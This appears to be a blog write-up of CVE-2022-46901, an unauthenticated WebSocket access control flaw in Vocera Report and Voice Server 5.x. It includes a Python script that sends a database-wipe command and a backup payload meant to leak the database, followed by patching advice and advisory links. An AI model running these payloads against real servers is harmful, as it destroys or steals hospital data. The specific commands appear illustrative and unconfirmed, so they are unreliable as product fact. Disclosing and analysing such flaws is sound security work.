Vocera, widely used across healthcare and enterprise environments for hands-free communication, suffered a serious vulnerability in its 5.x software line. In late 2022, CVE-2022-46901 was discovered: an access control flaw within the WebSocket interface of both the Vocera Report Server and Voice Server (versions up to and including 5.8). This bug lets an unauthenticated attacker issue system-level database commands, exposing organizations to serious data and integrity risks without needing to log in.
This post breaks down the vulnerability in simple terms, shares an exclusive look at how the exploit works (including example code) and points you to the official advisories.
What Happened?
The Vocera Report Console exposes a WebSocket interface for managing tasks and database operations. Due to improper access control, this interface fails to validate the user's authentication and privilege level.
Real-World Impact
- Data Loss/Integrity Risks: The attacker can erase or restore old database states, causing data wipes or rolling back information.
- Denial of Service: By triggering heavy backup or clearing operations, Vocera could be made unavailable for reporting.
- Potential Lateral Movement: Gaining backend access could set up for further attacks inside your environment.
Finding the WebSocket
On vulnerable servers, the Report Console is at:
https://[voice-server]:8443/report-console/
Within browser tools or by poking around, you’ll see a WebSocket endpoint, commonly something like:
ws://[voice-server]:808/reportws
No authentication required!
WebSocket Commands
Most administration tasks are triggered by sending JSON payloads over the WS connection.
Below, we use Python's websocket-client library to trigger a database wipe—without logging in
import websocket
import json
# Replace with your Vocera server address
ws_url = "ws://target.example.com:808/reportws"
# Connect to the WebSocket endpoint
ws = websocket.create_connection(ws_url)
# Construct payload for a database clear task
payload = {
"action": "clearDatabase"
}
# Send payload as JSON
ws.send(json.dumps(payload))
# Receive response from server
response = ws.recv()
print("Server response:", response)
# Clean up
ws.close()
*Important:* Many endpoints use self-signed certs or run on HTTP (ws://) rather than HTTPS (wss://). Adapt your tooling as needed.
To steal the database via backup
# Backup payload
payload = {
"action": "startBackup",
"parameters": {
"destination": "/tmp/leak.db"
}
}
# ... send via WebSocket
Then, fetch the backup via further unauthenticated endpoints or by accessing the filesystem if possible.
Mitigations & Patch Status
If you are running any Vocera 5.x software up to 5.8: you should upgrade immediately to the latest patched version.
Official advisory:
- https://nvd.nist.gov/vuln/detail/CVE-2022-46901
- Vocera (now Stryker) Security Bulletin *(search by CVE or ask support for fix details if unavailable)*
References
- NIST CVE: https://nvd.nist.gov/vuln/detail/CVE-2022-46901
- Vocera Security Page: https://www.vocera.com/security-alerts
- Full CVE Description on MITRE
Conclusion
CVE-2022-46901 is a critical example of how missing authentication on “admin” interfaces—especially those using modern protocols such as WebSockets—can open up devastating attack paths. For any critical communications platform like Vocera, immediate patching is required. Always audit unused interfaces, and remember: just because an endpoint isn’t widely known, doesn’t mean attackers won’t find and abuse it.
If you’re in healthcare or any environment using Vocera, check your exposure today.
*This writeup is for educational purposes only. Do not attack any system without explicit authorization.*
Timeline
Published on: 07/25/2023 20:15:00 UTC
Last modified on: 08/01/2023 01:32:00 UTC